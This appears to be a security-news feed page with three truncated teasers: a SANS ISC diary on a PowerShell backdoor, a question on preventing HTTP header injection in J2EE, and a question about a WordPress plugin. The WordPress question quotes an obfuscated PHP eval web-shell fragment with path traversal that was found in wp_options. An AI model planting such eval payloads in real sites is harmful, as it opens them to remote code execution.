[SANS ISC] PowerShell Backdoor Launched from a ShellCode

I published the following diary on isc.sans.edu: “PowerShell Backdoor Launched from a ShellCode“: When you need to perform malicious actions on a victim’s computer, the Internet is full of resources that can be reused, forked, slightly changed to meet your requirements. After all, why reinvent the wheel if some pieces

The post [SANS ISC] PowerShell Backdoor Launched from a ShellCode appeared first on /dev/random.

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How to prevent HTTP header injection attack in J2EE Web application? Is there any library (Maven dependency) available for this purpose?

My J2EE application is vulnerable to HTTP header injection attack. I want to make it secure from this vulnerability. Also, I am searching if any library (Maven dependency) available for this.

Continue reading How to prevent HTTP header injection attack in J2EE Web application? Is there any library (Maven dependency) available for this purpose?

hide_my_wp wordpress plugin is activated with php eval function that might trying to read /etc/passwd? Is it true?

When I install this plugin and activate in wordpress, hide_my_wp put some eval codes in wp_options and I see the following code being injected in a new row with the ID called 76624:
upload-dir=./../../,z=@eval/**/(${‘_P’.’OST’}[z9]/**/(${‘… Continue reading hide_my_wp wordpress plugin is activated with php eval function that might trying to read /etc/passwd? Is it true?